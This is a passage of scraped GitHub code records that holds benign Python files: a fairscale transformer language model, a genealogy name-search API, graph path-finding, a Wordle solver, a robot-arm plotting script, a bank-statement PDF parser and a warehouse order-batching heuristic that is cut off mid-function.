1 of https://arxiv.org/pdf/2002.04745v1.pdf\n\n x = src\n if self.norm_first:\n x = x + self._sa_block(self.norm1(x), src_mask, src_key_padding_mask)\n x = x + self._ff_block(self.norm2(x))\n else:\n x = self.norm1(x + self._sa_block(x, src_mask, src_key_padding_mask))\n x = self.norm2(x + self._ff_block(x))\n\n return x\n\n # self-attention block\n def _sa_block(self, x, attn_mask, key_padding_mask):\n x = self.self_attn(x, x, x, attn_mask=attn_mask, key_padding_mask=key_padding_mask, need_weights=False)[0]\n return self.dropout(x)\n\n # feed forward block\n def _ff_block(self, x):\n if self.is_moe:\n return self.moe_layer(x)\n else:\n return self.ff_block(x)\n\n\nclass TransformerDecoderLayer(TransformerEncoderLayer):\n \"\"\"TransformerDecoder layer which inherits from TransformerEncoderLayer.\"\"\"\n\n def __init__(self, ninp, nhead, nhid, dropout, is_moe=False, num_local_experts=1):\n super().__init__(ninp, nhead, nhid, dropout, is_moe=is_moe, num_local_experts=num_local_experts)\n self.src_mask = None\n\n def _generate_square_subsequent_mask(self, sz):\n mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)\n mask = mask.float().masked_fill(mask == 0, float(\"-inf\")).masked_fill(mask == 1, float(0.0))\n return mask\n\n def forward(self, src):\n # TODO(anj-s): Fix the data format so that we have [seq_len, batch_size, embedding dim].\n # Currently real data has seq_len as the second dimension and batch_size as the first dimension.\n # We need to mask the sequence length dimension and not the batch size.\n if self.src_mask is None or self.src_mask.size(0) != len(src):\n device = src.device\n mask = self._generate_square_subsequent_mask(len(src)).to(device)\n self.src_mask = mask\n\n return super().forward(src, self.src_mask)\n\n\nclass LinearLayer(nn.Linear):\n \"\"\"Wrapped nn.Linear layer to allow for weight initialization.\"\"\"\n\n def __init__(self, ninp, ntoken, initrange):\n super().__init__(ninp, ntoken)\n self.bias.data.zero_()\n self.weight.data.uniform_(-initrange, initrange)\n\n\nclass TransformerLM(nn.Sequential):\n \"\"\"A GPT-2 based nn.Sequential language model.\"\"\"\n\n def __init__(self, ntokens, ninp, nhead, nhid, dropout, initrange, ndecoder, is_moe=False, num_local_experts=1):\n layers = [\n EmbeddingLayer(ntokens, ninp, initrange),\n PositionalEncodingLayer(ninp, dropout),\n ]\n for _ in range(ndecoder):\n layers.append(TransformerDecoderLayer(ninp, nhead, nhid, dropout, is_moe, num_local_experts))\n\n layers.append(LinearLayer(ninp, ntokens, initrange))\n super(TransformerLM, self).__init__(*layers)\n","repo_name":"facebookresearch/fairscale","sub_path":"benchmarks/models/transformer_lm.py","file_name":"transformer_lm.py","file_ext":"py","file_size_in_byte":8244,"program_lang":"python","lang":"en","doc_type":"code","stars":2639,"dataset":"github-code","pt":"72"} +{"seq_id":"13419319857","text":"import shareds\r\nfrom bl.dates import DateRange\r\n\"\"\"\r\nhttps://isotammi.net/api/v0/search?lookfor=Pekka\r\n--> {\"status\":\"OK\",\r\n \"statusText\":\"OK\",\r\n \"resultCount\": 2,\r\n \"records\":[ { \"id\":\"123\", \"name\":\"Antrea\", \"type\":\"place\"},\r\n { \"id\":\"333\", \"name\":\"Antrea\", \"type\":\"village\"},\r\n ]\r\n }\r\n\r\n \r\n\"\"\"\r\nimport pprint\r\n\r\ncypher_search_refname = \"\"\"\r\nMATCH (p:Refname {name: $lookfor}) --> (b:Refname)\r\nRETURN b.name as refname\r\n\"\"\"\r\n\r\ncypher_fetch_namefamily = \"\"\"\r\nMATCH (n:Refname {name:$lookfor})\r\nOPTIONAL MATCH (n) --> (m:Refname)\r\nWITH COALESCE(m, n) AS base\r\nOPTIONAL 
MATCH (base) <-- (o:Refname)\r\nRETURN [base.name] + COLLECT(o.name) AS namefamily\r\n\"\"\"\r\n\r\n\r\ndef search_refname(rname):\r\n# print(f\"Looking for basename of name {rname}\")\r\n    result = shareds.driver.session().run(cypher_search_refname, lookfor=rname)\r\n    records = []\r\n    for rec in result:\r\n        records.append(rec['refname'])\r\n    if not records: \r\n        return dict(status=\"Not found\",statusText=\"Not found\",resultCount=0)\r\n    \r\n# records.append(surroundedBy=sorted(places1,key=lambda x:x['name'])) \r\n    return {\"status\":\"OK\",\r\n            \"statusText\":\"OK\",\r\n            \"resultCount\": len(records),\r\n            \"records\": records,\r\n           }\r\n\r\n\r\ndef fetch_namefamily(rname):\r\n# print(f\"Getting name family of {rname}\")\r\n    result = shareds.driver.session().run(cypher_fetch_namefamily, lookfor=rname)\r\n    if not result:\r\n# print(f\"namefamily for {rname} not found\") \r\n        return dict(status=\"Not found\",statusText=\"Not found\",resultCount=0)\r\n    for rec in result:\r\n        namefamily = rec['namefamily']\r\n# print(namefamily)\r\n        return {\"status\":\"OK\",\r\n                \"statusText\":\"OK\",\r\n                \"resultCount\": 1,\r\n                \"record\": namefamily, \r\n               }\r\n# print(f\"No namefamily in result for {rname} found\") \r\n    return dict(status=\"Not found\",statusText=\"Not found\",resultCount=0) \r\n\r\n","repo_name":"Taapeli/stk-upload","sub_path":"app/bp/api/refnameapi.py","file_name":"refnameapi.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}
{"seq_id":"21975114843","text":"from collections import defaultdict\ngraph = defaultdict(list)\n\ng = {'A': ['B', 'C'],\n     'B': ['E', 'D'],\n     'C': ['F', 'G'],\n     'D': ['H','I'],\n     'E': ['I'],\n     'F': ['I'],\n     'G': ['J'],\n     'J': ['I'],\n     'I': ['H']}\n\nfor i in g:\n    graph[i] = g[i]\n#DFS\ndef find_path_dfs(graph, start, end, path=[]):\n    path = path + [start] #see comment at bottom\n    if start == end:\n        return path\n    if start not in graph:\n        return None\n    for next_node in graph[start]:\n        if next_node not in path:\n            new_path = find_path_dfs(graph, next_node, end, path)\n            if new_path:\n                return new_path\n    return None\n\ndef find_all_paths_bfs(graph, start, end, stack=[]):\n    temp_path = [start]\n    stack.append(temp_path)\n    while stack:\n        temp_path = stack.pop(0)\n        last_node = temp_path[-1]\n        if last_node==end:\n            print(\"Valid Path\", temp_path)\n        children = graph[last_node]\n        for i in children:\n            if i not in temp_path:\n                new_path = temp_path + [i]\n\n                stack.append(new_path)\n\n\n\n\ndef find_all_paths(graph, start, end, path=[]):\n    path = path + [start] #see comment at bottom\n    if start == end:\n        return [path]\n    if start not in graph:\n        return []\n    paths = []\n    for next_node in graph[start]:\n        if next_node not in path:\n            new_paths = find_all_paths(graph, next_node, end, path)\n            for new_path in new_paths:\n                paths.append(new_path)\n    return paths\n\n\n\nprint(find_all_paths_bfs(graph, 'A', 'I'))\n\n# print(find_path_dfs(graph, 'A', 'D'))\n# print(find_all_paths(graph, 'A', 'D '))\n\n'''\nIf we had written \"path.append(start)\" instead, we would have\nmodified the variable 'path' in the caller, with disastrous results.\n'''\n","repo_name":"pyaf/hackerrank","sub_path":"data_structure/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"35877634715","text":"import random\n\n\nwith open('possible_words.txt') as f:\n\tpossible = [word.strip() for word in 
f];\n\nwith open('allowed_words.txt') as f:\n\tallowed = {word.strip() for word in f};\n\ndef choose_solution():\n\treturn random.choice(possible)\n\ndef check_guess(guess, solution):\n\tresult = \"\"\n\tfor x,y in zip(guess,solution):\n\t\tif x==y:\n\t\t\tresult += 'G'\n\t\telif x in solution:\n\t\t\tresult += 'Y'\n\t\telse:\n\t\t\tresult += 'X'\n\treturn result\n\nclass Guesser:\n\tdef __init__(self, allowed):\n\t\tself.words = [x for x in allowed]\n\n\tdef possible(self, clue, last_guess, word):\n\t\tcheck = True\n\t\tfor i,x in enumerate(clue):\n\t\t\tif x=='G':\n\t\t\t\tif word[i] != last_guess[i]:\n\t\t\t\t\tcheck = False\n\t\t\telif x == 'Y':\n\t\t\t\tif last_guess[i] not in word or word[i]==last_guess[i]:\n\t\t\t\t\tcheck = False\n\t\t\telif x == 'X':\n\t\t\t\tif last_guess[i] in word:\n\t\t\t\t\tcheck = False\n\t\treturn check\n\n\tdef make_guess(self, clue, last_guess):\n\t\tif not clue:\n\t\t\treturn random.choice(self.words)\n\t\tself.words = [word for word in self.words if self.possible(clue, last_guess, word)]\n\t\treturn random.choice(self.words)\n\n#print(choose_solution())\ndef make_attempt(clue, tried):\n\tif not clue:\n\t\tcandidate = [x for x in allowed]\n\t\treturn random.choice(candidate)\n\treturn random.choice(possible)\n\n\ndef play_game():\n\tanswer = choose_solution()\n\t# attempt = input(\"Enter guess: \")\n\t# print(attempt)\n\tguesses = []\n\tai = Guesser(allowed)\n\tclue = \"\"\n\tattempt = \"\"\n\tfor x in range(6):\n\t\t# attempt = \"\"\n\t\t# while attempt in guesses or attempt not in allowed:\n\t\t# \tattempt = input(\"Enter guess: \")\n\t\t# print(attempt, \"accepted\")\n\t\tattempt = ai.make_guess(clue, attempt)\n\t\tguesses += [attempt]\n\n\t\t# print(guesses)\n\t\tresult = check_guess(attempt, answer)\n\t\tclue = result\n\t\t# print (result)\n\n\t\tif attempt == answer:\n\t\t\t# print(\"Correct\")\n\t\t\treturn True, len(guesses)\n\t\t\tbreak\n\t\t# else:\n\t\t\t# print(\"Try again\")\n\t# print(\"Solution\", answer)\n\treturn False, 0\n\ncorrect = 0\ntotal_tries = 0\nfor x in range(100):\n\twin, tries = play_game()\n\tif win:\n\t\tcorrect += 1\n\t\ttotal_tries += tries\n\nprint(correct,\"guessed out of 100\")\nprint(total_tries/correct,'average guesses')","repo_name":"nathanianah/GWS","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32062660666","text":"# ===============================================================================\n# e02_2DOF_RR_robot.py\n#\n# A simple example for drawing a RR robot\n#\n# Author(s):\n# Seied Muhammad Yazdian\n#\n# Last update:\n# Feb 3, 2022\n# ===============================================================================\n\nimport numpy as np\nimport roboticlib_path\nimport roboticlib as rl\nimport matplotlib.pyplot as plt\nimport graphiclib_path\nimport graphiclib as gl\n\nshow_plots = True\n\n\ndef main():\n LINK1 = 3.0\n LINK2 = 2.0\n\n theta_1 = 10.0\n theta_2 = 20.0\n\n frame_00 = rl.rotation_matrix_z(0.0)\n frame_01 = rl.rotation_matrix_z(theta_1)\n frame_12 = rl.rotation_matrix_z(theta_2)\n frame_02 = np.matmul(frame_01, frame_12)\n\n p0 = np.array([0, 0, 0])\n p1 = np.matmul(frame_01, np.array([LINK1, 0, 0]))\n p2 = np.matmul(frame_01, np.array(\n [LINK1, 0, 0] + np.matmul(frame_12, np.array([LINK2, 0, 0]))))\n\n trans_01 = rl.transformation_matrix(0, 1, 0, -10)\n\n # Display contents\n fig = plt.figure()\n ax = plt.axes(projection='3d')\n 
gl.draw_generic_3d(ax, 'frame', frame_00, position=p0)\n gl.draw_generic_3d(ax, 'frame', frame_01, position=p1)\n gl.draw_generic_3d(ax, 'frame', frame_02, position=p2)\n plt.plot((p0[0], p1[0]), (p0[1], p1[1]), (p0[2], p1[2]), 'k')\n plt.plot((p1[0], p2[0]), (p1[1], p2[1]), (p1[2], p2[2]), 'k')\n gl.draw_generic_3d(ax, 'trans', trans_01)\n gl.set_axes_equal_3d(ax)\n if show_plots:\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Muhammad-Yazdian/Python-for-Mechanical-Engineers","sub_path":"Robotics/examples/e02_2DOF_RR_robot.py","file_name":"e02_2DOF_RR_robot.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25827501509","text":"\n# coding: utf-8\n\n# In[127]:\n\n\nimport pandas as pd\nimport tabula\n\n\n# In[61]:\n\n\nstatement='ICICI_Statement_6months.pdf'\n\n\n# In[62]:\n\n\nbank_st=tabula.read_pdf(statement,pages='all', pandas_options={'header': None})\n\n\n# In[63]:\n\n\nprint(type(bank_st), len(bank_st))\ntype(bank_st[0])\n\n\n# In[64]:\n\n\nbk0 = bank_st[0]\nprint(type(bk0),len(bk0))\n\n\n# In[65]:\n\n\nbk0.head(10)\n\n\n# In[95]:\n\n\ncnt = len(bank_st)\ntotal_state =bank_st[0].append(bank_st[1:cnt])\n\n\n# In[97]:\n\n\ntotal_state.info()\n\n\n# In[98]:\n\n\ntotal_state.shape\n\n\n# In[99]:\n\n\ntotal_state\n\n\n# In[100]:\n\n\ntotal_state.reset_index(inplace = True,drop = True)\n\n\n# In[101]:\n\n\ntotal_state\n\n\n# In[102]:\n\n\ntotal_state = total_state.drop([0], axis=1)\n\n\n# In[103]:\n\n\ntotal_state.head()\n\n\n# In[104]:\n\n\ntotal_state.rename(columns={1: 'Date', 4: 'Narration', 3:'Chq', 2:'ValueDt', 5:'WithDrawalAmt', 6:'DepositAmt', 7:'ClosingBalance'}, inplace=True)\n\n\n# In[105]:\n\n\ntotal_state.head()\n\n\n# In[106]:\n\n\n# Drop the first 4 records\ntotal_state = total_state.drop(total_state.index[0:4])\n\n\n# In[116]:\n\n\n# drop record if Narration filed is null\ntotal_state=total_state.dropna(subset=['Narration'])\n\n\n# In[117]:\n\n\ntotal_state.reset_index(inplace = True,drop = True)\n\n\n# In[118]:\n\n\nmyIndex = 0\nfor index, row in total_state.iterrows():\n x = row.Date\n \n if pd.notnull(x):\n myIndex = index \n print(\"reset\",myIndex)\n else:\n print(\"Index -\", index ) \n \n # Append Previous record of Narration + current Narration\n narMsg= total_state[myIndex:myIndex+1]['Narration'] + row.Narration\n \n # Update Previous Record\n total_state[myIndex:myIndex+1]['Narration'] = narMsg\n \n print(narMsg)\n\n\n# In[114]:\n\n\ntotal_state.head()\n\n\n# In[119]:\n\n\n# drop record if date filed is null\ntotal_state=total_state.dropna(subset=['Date'])\n\n\n# In[123]:\n\n\ntotal_state.reset_index(inplace = True,drop = True)\n\n\n# In[124]:\n\n\ntotal_state\n\n\n# In[131]:\n\n\ntotal_state.to_csv('total_state_ICICI.csv',index = False, header=True)\n\n\n# In[132]:\n\n\ndf=pd.read_csv('total_state_ICICI.csv')\n\n\n# In[135]:\n\n\ndf\n\n\n# ### Connect to database\n\n# In[31]:\n\n\nimport sqlite3\n\n\n# In[40]:\n\n\nconn=sqlite3.connect('Bank_Statement.db') #Database name is \"Bank_Statement.db\"\n\n\n# In[41]:\n\n\nc=conn.cursor()\n\n\n# In[42]:\n\n\nc.execute('''CREATE TABLE bank_stt (Date date, Narration varchar2, Chq varchar2, ValueDt date, \n WithDrawalAmt float, DepositAmt float, ClosingBalance float)''')\nconn.commit()\n\n\n# In[43]:\n\n\ndf.to_sql('bank_stt', conn, if_exists='replace', index = False)\n\n\n# In[45]:\n\n\nc.execute(''' \nSELECT * FROM bank_stt\n ''')\n\n\n# In[46]:\n\n\nfor row in c.fetchall():\n print(row)\n\n\n# 
### Working With Excel\n\n# In[111]:\n\n\nimport openpyxl\n\n\n# In[51]:\n\n\n# Give the location of the file\n#path = \"C:\\\\Users\\\\Itishree\\\\Downloads\\\\ICICI_Stmt.xlsx\"\n\n\n# In[112]:\n\n\n#workbook = openpyxl.load_workbook(path)\nworkbook = openpyxl.load_workbook('ICICI_Stmt.xlsx')\n\n\n# In[115]:\n\n\nworksheet = workbook.active\n\n\n# In[136]:\n\n\nTotal_Credit=df['DepositAmt'].sum()\nprint(Total_Credit)\n\n\n# In[117]:\n\n\nworksheet['D3']=Total_Credit\n\n\n# In[138]:\n\n\nBalance=df.iloc[-1][-1]\nprint(Balance)\n\n\n# In[124]:\n\n\nworksheet['C3']=Balance\n\n\n# In[137]:\n\n\n#df['ClosingBalance'].sum() / df.index.size\nAvg_Bal_6months=df['ClosingBalance'].mean()\nprint(Avg_Bal_6months)\n\n\n# In[145]:\n\n\nworksheet['B11']=Avg_Bal_6months\n\n\n# In[146]:\n\n\nworkbook.save('ICICI_Stmt.xlsx')\n\n\n# In[171]:\n\n\ndf.dtypes\n\n\n# In[169]:\n\n\n#df['Date']=df['Date'].astype('date')\ndf['Date']= pd.to_datetime(df['Date'])\n\n\n# In[170]:\n\n\ndf.head()\n\n","repo_name":"Itishree211/Bank_Statement_Analysis","sub_path":"ICICI_Bank_statement_PDF.py","file_name":"ICICI_Bank_statement_PDF.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20734376552","text":"\"\"\"\nThis script implements heuristics for the AGV assisted warehouse routing problem under the assumption of a MIXED\nstorage policy\n\"\"\"\n\n# example to use\nimport numpy as np\nimport pickle\nimport math\nimport time\nfrom operator import itemgetter\nfrom utils import *\nimport copy\nimport random\nimport heapq\nfrom operator import attrgetter\ntry:\n from Queue import LifoQueue\nexcept ImportError:\n from queue import LifoQueue\nfrom collections import Counter\nimport pandas as pd\nimport itertools\n\nfrom prepare_data import Demo\n\n\nclass GreedyMixedShelves(Demo):\n \"\"\"\n This class implements a greedy heuristic for the AGV assisted warehouse routing problem under the assumption of\n a MIXED storage policy. 
This class inherits from Demo class to access the functions and attributes defined\n there\n \"\"\"\n\n def __init__(self, input_files):\n super(GreedyMixedShelves, self).__init__(*input_files)\n self.item_id_pod_id_dict = defaultdict(dict)\n self.solution = None\n self.orders_of_batches = dict()\n self.batches = dict()\n self.fill_item_id_pod_id_dict()\n self.fill_station_id_bot_id_dict()\n self.warehouseInstance.Orders = {\n str(key): value for key, value in enumerate(self.warehouseInstance.Orders)\n }\n # exclude too big orders\n self.warehouseInstance.Orders = {\n key: value\n for key, value in self.warehouseInstance.Orders.items()\n if self.get_total_weight_by_order(key) <= 18\n }\n self.item_id_pod_id_dict_orig = copy.deepcopy(\n self.item_id_pod_id_dict\n ) # save copies of shelves in order to rollback and test the solution\n self.total_weight = sum(\n [\n self.get_total_weight_by_order(order)\n for order in self.warehouseInstance.Orders.keys()\n ]\n )\n\n def tests(self):\n assert all(\n [\n batch_i.items[item] is batch_i.orders[item.split(\"_\")[0]].items[item]\n for batch_i in self.batches.values()\n for item in batch_i.items.keys()\n ]\n )\n assert all(\n [\n all([x in batch.route for x in batch.items_of_shelves.keys()])\n for batch in self.batches.values()\n ]\n )\n assert all([len(batch.route) > 0 for batch in self.batches.values()])\n assert all([\n abs(len(self.get_batches_for_station(ps1)) - len(self.get_batches_for_station(ps2))) < 2\n for ps1, ps2 in list(itertools.combinations(self.warehouseInstance.OutputStations.keys(), 2))\n ])\n assert set(self.warehouseInstance.Orders.keys()).symmetric_difference(set([x for batch in self.batches.values() for x in batch.orders])) == set()\n # test whether the stock is correct\n item_id_pod_id_dict_orig_copy = copy.deepcopy(self.item_id_pod_id_dict_orig)\n for batch in self.batches.values():\n for item in batch.items.values():\n item_id_pod_id_dict_orig_copy[item.orig_ID][item.shelf] -= 1\n try:\n assert item_id_pod_id_dict_orig_copy == self.item_id_pod_id_dict\n except AssertionError as e:\n for ik, item in self.item_id_pod_id_dict.items():\n for sk, shelf in item.items():\n if shelf != item_id_pod_id_dict_orig_copy[ik][sk]:\n print(ik, sk)\n raise e\n\n assert all([stock >= 0 for item in self.item_id_pod_id_dict.values() for stock in item.values()])\n\n def get_station_with_min_total_distance(self, order_idx):\n \"\"\"\n function to retrieve the station which minimizes the total distance of the items of the\n specified order. 
The distance of an item to a packing station is measured by the distance to the closest shelf storing\n        that item\n        :param order_idx: index of the order\n        \"\"\"\n        items = self.get_items_plus_quant_by_order(\n            order_idx\n        )  # todo refactor with get_items_by_order function\n        order_pack_dists = dict()\n        for pack_station in list(self.warehouseInstance.OutputStations.keys()):\n            item_dists = []\n            for item_id, item_quant in items.items():\n                shelves_with_item = list(self.item_id_pod_id_dict[item_id].keys())\n                shelf_distances = {}\n                for shelf in shelves_with_item:\n                    shelf_distances[shelf] = self.distance_ij[pack_station, shelf]\n                item_dists.extend([min(shelf_distances.values())] * item_quant)\n            order_pack_dists[pack_station] = np.sum(item_dists)\n        ordered_list = sorted(\n            order_pack_dists.items(), key=lambda item: item[1], reverse=False\n        )\n        savings = [\n            ordered_list[i + 1][1] - ordered_list[i][1]\n            for i in range(len(ordered_list) - 1)\n        ] + [-float(\"inf\")]\n        return {k[0]: savings[i] for i, k in enumerate(ordered_list)}\n\n    def do_station_assignment(self, order):\n        station_dict = self.get_station_with_min_total_distance(order)\n        num_ps = len(self.warehouseInstance.OutputStations)\n        station_dict_copy = station_dict.copy()\n        while True:\n            try:\n                best_station = next(iter(station_dict))\n            except StopIteration:\n                best_station = next(iter(station_dict_copy))\n                return best_station\n            weight_of_station = sum(\n                [\n                    self.get_total_weight_by_order(order)\n                    for order in self.get_orders_assigned_to_station(best_station)\n                ]\n            )\n            if not np.ceil(\n                (weight_of_station + self.get_total_weight_by_order(order))\n                / self.batch_weight\n            ) > np.ceil(np.ceil(self.total_weight / self.batch_weight) / num_ps):\n                return best_station\n            else:\n                station_dict.pop(best_station)\n\n    def assign_orders_to_stations(self):\n        \"\"\"\n        assigns an order to a given station according to the minimum total distance. May lead to unbalanced\n        
that all orders are assigned to only one station.\n :return:\n \"\"\"\n\n def do_assignment(order_dists, orders_of_stations=None, weight_of_station=None):\n\n orders_of_stations = (\n defaultdict(list) if not orders_of_stations else orders_of_stations\n )\n weight_of_station = (\n defaultdict(int) if not weight_of_station else weight_of_station\n )\n num_ps = len(self.warehouseInstance.OutputStations)\n\n order_dists = {\n k: v\n for k, v in sorted(\n order_dists.items(),\n key=lambda item: list(item[1].values())[0],\n reverse=True,\n )\n }\n\n dict_copy = order_dists.copy()\n for order, distances in order_dists.items():\n for station in distances.keys():\n if not np.ceil(\n (\n weight_of_station[station]\n + self.get_total_weight_by_order(order)\n )\n / self.batch_weight\n ) > np.ceil(\n np.ceil(self.total_weight / self.batch_weight) / num_ps\n ):\n orders_of_stations[station].append(order)\n weight_of_station[station] += self.get_total_weight_by_order(\n order\n )\n dict_copy.pop(order)\n break\n elif (\n len(dict_copy[order]) == 1\n ): # fits in no ps under optimal assumptions\n lighter_station = min(\n weight_of_station.keys(),\n key=(lambda k: weight_of_station[k]),\n )\n orders_of_stations[lighter_station].append(order)\n weight_of_station[\n lighter_station\n ] += self.get_total_weight_by_order(order)\n dict_copy.pop(order)\n break\n else:\n dict_copy[order].pop(station)\n orders_of_stations = do_assignment(\n dict_copy, orders_of_stations, weight_of_station\n )\n return orders_of_stations\n return orders_of_stations\n\n order_dists = {\n order: self.get_station_with_min_total_distance(order)\n for order in self.warehouseInstance.Orders.keys()\n }\n\n orders_of_stations = do_assignment(order_dists)\n\n return orders_of_stations\n\n def greedy_next_order_to_batch(\n self, batch: BatchNew, already_assigned, orders_of_station, forbidden=None\n ):\n \"\"\"\n determines which order out of the not assigned orders will be assigned to a given batch. The order which\n minimizes the minimum distance of all items of the order to any item in the batch is chosen.\n Again, we define as distance the distance of the shelf minimizing the distance to an item. The reasoning here\n is, that a order which is stored close to some item that is already in the batch will not add much distance to\n the tour itself.\n :param batch:\n :param already_assigned: list of orders which are already assigned to batches\n :param orders_of_station: list of orders that are assigned to the packing station of the batch\n :param forbidden: orders which have investigated already but would add to much weight to the batch\n :return:\n \"\"\"\n if forbidden is None:\n forbidden = []\n other_orders_of_station = np.setdiff1d(\n orders_of_station, already_assigned + forbidden\n )\n print(\n \"other unassigned orders in the same station ({}) as this batch: \".format(\n batch.pack_station\n ),\n other_orders_of_station,\n )\n sum_min_dist_to_item = dict()\n for order in other_orders_of_station:\n min_distances = []\n for item_in_batch_id, item_in_batch in batch.items.items():\n dist_per_item_to_curr_item = []\n for item in self.get_items_by_order(order):\n min_dist_shelf = min(\n [\n self.distance_ij[item_in_batch.shelf, shelf]\n for shelf in list(self.item_id_pod_id_dict[item].keys())\n ]\n )\n dist_per_item_to_curr_item.append(min_dist_shelf)\n min_distances.append(min(dist_per_item_to_curr_item))\n\n sum_min_dist_to_item[order] = np.sum(\n min_distances\n ) # average instead? 
otherwise we always pick small orders\n\n        return min(sum_min_dist_to_item.keys(), key=(lambda k: sum_min_dist_to_item[k]))\n\n    def replenish_shelves(self, batch: BatchNew):\n        \"\"\"\n        if a batch is destroyed, the items that were taken from the shelves during the tour need to be added to the\n        shelves again.\n        :param batch:\n        :return:\n        \"\"\"\n        for item_id, item in batch.items.items():\n            if item.shelf:\n                self.item_id_pod_id_dict[item.orig_ID][item.shelf] += 1\n            else:\n                pass  # SKU not scheduled yet, thus no item has been taken from the shelves\n\n    def calc_increase_dist(self, route, shelf, i, pack_station):\n        \"\"\"\n        given a route, this function calculates how much distance a given shelf would add to the tour if it were\n        inserted at a given position of the route.\n        :param route: current route\n        :param shelf: new node / shelf\n        :param i: position to insert the new node at\n        :param pack_station: pack station of the batch\n        :return:\n        \"\"\"\n        if len(route) == 0:\n            return (\n                self.distance_ij[pack_station, shelf]\n                + self.distance_ij[shelf, pack_station]\n            )\n        # we favor solutions where the same shelf is visited all at once and not at different parts of the route,\n        # thus give it a negative penalty here\n        try:\n            if route[i] == shelf:\n                return -0.1\n        except IndexError:\n            if route[i - 1] == shelf:\n                return -0.1\n        # if the shelf at the current position of the tour is not equal to the candidate shelf, the distance added to\n        # the tour by candidate shelf j at position i is calculated as follows: d_{i-1, j} + d_{j, i} - d_{i-1, i}\n        # (pack stations are added manually as they are not \"part\" of route object)\n        if i == 0:\n            add_dist = (\n                self.distance_ij[pack_station, shelf]\n                + self.distance_ij[shelf, route[i]]\n            )\n            subtr_dist = self.distance_ij[pack_station, route[i]]\n        elif i == len(route):\n            add_dist = (\n                self.distance_ij[route[-1], shelf]\n                + self.distance_ij[shelf, pack_station]\n            )\n            subtr_dist = self.distance_ij[route[-1], pack_station]\n        else:\n            add_dist = (\n                self.distance_ij[route[i - 1], shelf]\n                + self.distance_ij[shelf, route[i]]\n            )\n            subtr_dist = self.distance_ij[route[i - 1], route[i]]\n        return add_dist - subtr_dist\n\n    def greedy_cobot_tour(self, batch: BatchNew, items=None):\n        \"\"\"\n        function to determine an (initial) route in a greedy manner. 
This is done by looking for the shelf / position\n        combination of each item to be inserted in the tour that minimizes the added distance, and adding those\n        shelves at the corresponding positions until all items are included in the tour\n        :param batch:\n        :param items:\n        :return:\n        \"\"\"\n        if not items:\n            items = batch.items  # copy.deepcopy(batch.items)\n            batch.route = (\n                []\n            )  # if all items of a batch shall be scheduled, the current tour needs to be discarded\n            self.replenish_shelves(batch)  # replenish shelves\n        else:\n            items = items  # copy.deepcopy(items)\n\n        for item in items.values():  # iterate over all items in the batch\n            batch_copy = copy.deepcopy(\n                batch\n            )  # make a copy to not change the current batch if not intended\n            shelf_add_distances = {}\n            for shelf in item.shelves:\n                if (\n                    self.item_id_pod_id_dict[item.orig_ID][shelf] > -1000\n                ):  # can only take item if available at that shelf\n                    # look for each position of the tour how much distance the new shelf would add\n                    added_dists = {\n                        i: self.calc_increase_dist(\n                            batch_copy.route, shelf, i, batch_copy.pack_station\n                        )\n                        for i in range(len(batch.route) + 1)\n                    }\n                    # determine the position at which the shelf adds the lowest distance\n                    min_pos, min_pos_dist = min(added_dists.items(), key=itemgetter(1))\n                    shelf_add_distances[shelf, min_pos] = min_pos_dist\n                else:\n                    pass\n                    # print(\"Shelf {} has no more units of item {}.\".format(shelf, item.orig_ID))\n\n            # retrieve the shelf for which the item adds the lowest possible distance to the current tour\n            min_shelf, min_pos = min(shelf_add_distances, key=shelf_add_distances.get)\n            # insert the shelf at the corresponding position\n            batch.route_insert(min_pos, min_shelf, item)\n            item.shelf = min_shelf\n            assert item is batch.items[item.ID]\n            # remove one unit of the item from the shelf\n            self.item_id_pod_id_dict[item.orig_ID][min_shelf] -= 1\n\n    def get_new_batch_id(self):\n        \"\"\"after destroying a batch, new IDs have to be given to new batches. This function checks whether IDs are\n        free within the sequence of existing numbers, and otherwise adds one to the highest ID number\"\"\"\n        if not self.batches:\n            return 0\n        curr_batch_ids = [int(batch.ID) for batch in self.batches.values()]\n        sequence = np.arange(0, max(curr_batch_ids) + 1, 1)\n        gaps = np.setdiff1d(sequence, curr_batch_ids)\n        if len(gaps) == 0:\n            return max(curr_batch_ids) + 1\n        else:\n            return min(gaps)\n\n    def assign_orders_to_batches_greedy(self, pack_station):\n        \"\"\"\n        function to assign all orders of a given packing station. Goes on until all orders are assigned to a batch.\n        For a given batch, orders are assigned to it until no order can be assigned to it without violating the\n        capacity restriction. 
To assign an order to a given batch the function defined above is used\n        :param pack_station: ID of the pack station\n        :return:\n        \"\"\"\n        orders_of_station = self.assign_orders_to_stations()[pack_station]\n        already_assigned = list()\n        while len(already_assigned) != len(orders_of_station):\n            batch_id = str(self.get_new_batch_id())\n            batch = BatchNew(\n                batch_id, pack_station, self.station_id_bot_id_dict[pack_station]\n            )\n            print(\"initialized new batch with ID: \", batch.ID)\n            # initialize the batch with a random order\n            init_order = np.random.choice(\n                np.setdiff1d(orders_of_station, already_assigned)\n            )\n            items_of_order = self.get_items_by_order(init_order)\n            weight_of_order = self.get_total_weight_by_order(init_order)\n            init_order = OrderOfBatch(\n                init_order,\n                items_of_order,\n                weight_of_order,\n                self.item_id_pod_id_dict,\n                batch.ID,\n            )\n            batch.add_order(init_order)\n            self.greedy_cobot_tour(batch)\n            already_assigned.append(init_order.ID)\n            forbidden_for_batch = []\n            while batch.weight < self.batch_weight and not len(\n                np.union1d(already_assigned, forbidden_for_batch)\n            ) == len(orders_of_station):\n                new_order = self.greedy_next_order_to_batch(\n                    batch, already_assigned, orders_of_station, forbidden_for_batch\n                )\n                weight_of_order = self.get_total_weight_by_order(new_order)\n                print(\"Chosen order: \", new_order)\n                if (batch.weight + weight_of_order) <= self.batch_weight:\n                    print(\"and it also fits in the current batch ({})\".format(batch_id))\n                    already_assigned.append(new_order)\n                    items_of_order = 